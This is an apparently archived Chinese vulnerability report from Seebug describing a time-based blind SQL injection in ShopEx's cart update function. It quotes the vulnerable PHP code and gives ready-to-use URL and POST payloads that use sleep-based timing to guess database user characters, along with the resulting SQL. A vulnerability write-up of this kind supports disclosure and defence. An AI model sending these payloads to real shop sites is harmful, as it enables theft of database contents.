ShopEx某处SQL注入（可猜测敏感信息）

2015-02-13T00:00:00

Description

### 简要描述： ShopEx sql注入 ### 详细说明：分析一下代码： ctl.cart.php: ``` function updateCart($objType='g', $key=''){ $key = str_replace('@', '-', $key); $nQuantity = $_POST['cartNum'][$objType][$key]; switch($objType) { case 'f': $oCart->member['member_lv_id'] =$GLOBALS['runtime']['member_lv']; $oCart->member['point'] = $this->member['point']; break; case 'g': break; case 'p': break; default: break; } if(!$this->objCart->updateCart($objType, $key, $nQuantity,$aError)){ echo implode('',$aError); }else{ $this->cartTotal(); } } ``` 这里对传递进来的$key进行了分解，分解完毕之后然后updateCart，如果updateCart结果不成立然后就cartTotal ``` function cartTotal(){ $this->ctl_cart(); $sale = &$this->system->loadModel('trading/sale'); $trading = $sale->getCartObject($this->cart,$GLOBALS['runtime']['member_lv'],true); $this->pagedata['trading'] = &$trading; $this->__tmpl = 'cart/cart_total.html'; $this->output(); } ``` 这里进行了获取操作，因为shopex是加密的，部分解密分析了一下，这里我们直接看 sql后台抓到的语句发送url: http://localhost/shopex/?cart-g-2@100) or if(ascii(mid(user(),1,1))rlike(115),sleep(1%2f10),1)%23@na-updateCart.html postdata： cartNum[g][2-100) or if(ascii(mid(user(),1,1))rlike(115),sleep(1%2f10),1)#-na]=123 我系统是root@localhost用户所以第一个字母的ascii应该为114，这里首先我们给出115使其不成立 [<img src="https://images.seebug.org/upload/201502/1309495588a274371e4f4bca850ac92374961fd6.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/1309495588a274371e4f4bca850ac92374961fd6.png) 造成566毫秒然后改为114，发送url前清空cookie，不然会造成过滤 url: http://localhost/shopex/?cart-g-2@100) or if(ascii(mid(user(),1,1))rlike(114),sleep(1%2f10),1)%23@na-updateCart.html postdata: cartNum[g][2-100) or if(ascii(mid(user(),1,1))rlike(114),sleep(1%2f10),1)#-na]=123 [<img src="https://images.seebug.org/upload/201502/13095154a74c44fff28ef3d9c3a5e9649111bca9.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/13095154a74c44fff28ef3d9c3a5e9649111bca9.png) 造成3.85秒延迟这里解释一下为什么秒数为1/10 因为这里是一个join操作，每查询一次就会sleep一下，故而不能设置sleep过大，不然造成数据库挂掉了后台抓取sql语句为 SELECT p.*,t.setting,g.score,g.brand_id,g.cat_id,g.type_id,g.image_default,g.thumbnail_pic FROM sdb_products AS p LEFT JOIN sdb_goods AS g ON p.goods_id=g.goods_id LEFT JOIN sdb_goods_type AS t ON g.type_id=t.type_id WHERE p.product_id IN (100) or if(ascii(mid(user(),1,1))rlike(114),sleep(1/10),1)#) 看到给的payload 就可以进行猜测敏感信息 ### 漏洞证明：

{"type": "seebug", "lastseen": "2017-11-19T13:06:15", "href": "https://www.seebug.org/vuldb/ssvid-93550", "cvss": {"score": 0.0, "vector": "NONE"}, "modified": "2015-02-13T00:00:00", "reporter": "Root", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\nShopEx sql\u6ce8\u5165\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\n\u5206\u6790\u4e00\u4e0b\u4ee3\u7801\uff1a\nctl.cart.php:\n\n\n```\nfunction updateCart($objType='g', $key=''){\n \t\n $key = str_replace('@', '-', $key);\n \n $nQuantity = $_POST['cartNum'][$objType][$key];\n \n switch($objType) {\n case 'f':\n $oCart->member['member_lv_id'] =$GLOBALS['runtime']['member_lv'];\n $oCart->member['point'] = $this->member['point'];\n break;\n case 'g':\n break;\n case 'p':\n break;\n default:\n break;\n }\n \n if(!$this->objCart->updateCart($objType, $key, $nQuantity,$aError)){\n echo implode('',$aError);\n }else{\n $this->cartTotal();\n }\n }\n```\n\n\n\u8fd9\u91cc\u5bf9\u4f20\u9012\u8fdb\u6765\u7684$key\u8fdb\u884c\u4e86\u5206\u89e3\uff0c\u5206\u89e3\u5b8c\u6bd5\u4e4b\u540e\u7136\u540eupdateCart\uff0c\u5982\u679cupdateCart\u7ed3\u679c\u4e0d\u6210\u7acb\u7136\u540e\u5c31cartTotal\n\n\n```\nfunction cartTotal(){\n $this->ctl_cart();\n $sale = &$this->system->loadModel('trading/sale');\n $trading = $sale->getCartObject($this->cart,$GLOBALS['runtime']['member_lv'],true);\n $this->pagedata['trading'] = &$trading;\n $this->__tmpl = 'cart/cart_total.html';\n $this->output();\n }\n```\n\n\n\u8fd9\u91cc\u8fdb\u884c\u4e86\u83b7\u53d6\u64cd\u4f5c\uff0c\u56e0\u4e3ashopex\u662f\u52a0\u5bc6\u7684\uff0c\u90e8\u5206\u89e3\u5bc6\u5206\u6790\u4e86\u4e00\u4e0b\uff0c\u8fd9\u91cc\u6211\u4eec\u76f4\u63a5\u770b\nsql\u540e\u53f0\u6293\u5230\u7684\u8bed\u53e5\n\u53d1\u9001url:\nhttp://localhost/shopex/?cart-g-2@100) or if(ascii(mid(user(),1,1))rlike(115),sleep(1%2f10),1)%23@na-updateCart.html\npostdata\uff1a\ncartNum[g][2-100) or if(ascii(mid(user(),1,1))rlike(115),sleep(1%2f10),1)#-na]=123\n\u6211\u7cfb\u7edf\u662froot@localhost\u7528\u6237\u6240\u4ee5\u7b2c\u4e00\u4e2a\u5b57\u6bcd\u7684ascii\u5e94\u8be5\u4e3a114\uff0c\u8fd9\u91cc\u9996\u5148\u6211\u4eec\u7ed9\u51fa115\u4f7f\u5176\u4e0d\u6210\u7acb\n\n\n[<img src=\"https://images.seebug.org/upload/201502/1309495588a274371e4f4bca850ac92374961fd6.png\" alt=\"3.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201502/1309495588a274371e4f4bca850ac92374961fd6.png)\n\n\n\u9020\u6210566\u6beb\u79d2\n\u7136\u540e\u6539\u4e3a114\uff0c\u53d1\u9001url\u524d\u6e05\u7a7acookie\uff0c\u4e0d\u7136\u4f1a\u9020\u6210\u8fc7\u6ee4\nurl:\nhttp://localhost/shopex/?cart-g-2@100) or if(ascii(mid(user(),1,1))rlike(114),sleep(1%2f10),1)%23@na-updateCart.html\npostdata:\ncartNum[g][2-100) or if(ascii(mid(user(),1,1))rlike(114),sleep(1%2f10),1)#-na]=123\n\n\n[<img src=\"https://images.seebug.org/upload/201502/13095154a74c44fff28ef3d9c3a5e9649111bca9.png\" alt=\"4.png\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201502/13095154a74c44fff28ef3d9c3a5e9649111bca9.png)\n\n\n\u9020\u62103.85\u79d2\u5ef6\u8fdf \n\u8fd9\u91cc\u89e3\u91ca\u4e00\u4e0b\u4e3a\u4ec0\u4e48\u79d2\u6570\u4e3a1/10 \u56e0\u4e3a\u8fd9\u91cc\u662f\u4e00\u4e2ajoin\u64cd\u4f5c\uff0c\u6bcf\u67e5\u8be2\u4e00\u6b21\u5c31\u4f1asleep\u4e00\u4e0b\uff0c\u6545\u800c\u4e0d\u80fd\u8bbe\u7f6esleep\u8fc7\u5927 \uff0c\u4e0d\u7136\u9020\u6210\u6570\u636e\u5e93\u6302\u6389\u4e86\n\u540e\u53f0\u6293\u53d6sql\u8bed\u53e5\u4e3a\nSELECT p.*,t.setting,g.score,g.brand_id,g.cat_id,g.type_id,g.image_default,g.thumbnail_pic\n FROM sdb_products AS p\n LEFT JOIN sdb_goods AS g ON p.goods_id=g.goods_id\n LEFT JOIN sdb_goods_type AS t ON g.type_id=t.type_id\n WHERE p.product_id IN (100) or if(ascii(mid(user(),1,1))rlike(114),sleep(1/10),1)#)\n\u770b\u5230\u7ed9\u7684payload \u5c31\u53ef\u4ee5\u8fdb\u884c\u731c\u6d4b\u654f\u611f\u4fe1\u606f \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a", "bulletinFamily": "exploit", "references": [], "viewCount": 7, "status": "details", "sourceHref": "", "cvelist": [], "enchantments_done": [], "title": "ShopEx\u67d0\u5904SQL\u6ce8\u5165\uff08\u53ef\u731c\u6d4b\u654f\u611f\u4fe1\u606f\uff09", "id": "SSV:93550", "sourceData": "", "published": "2015-02-13T00:00:00", "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645458449, "score": 1659785532, "epss": 1678848988}}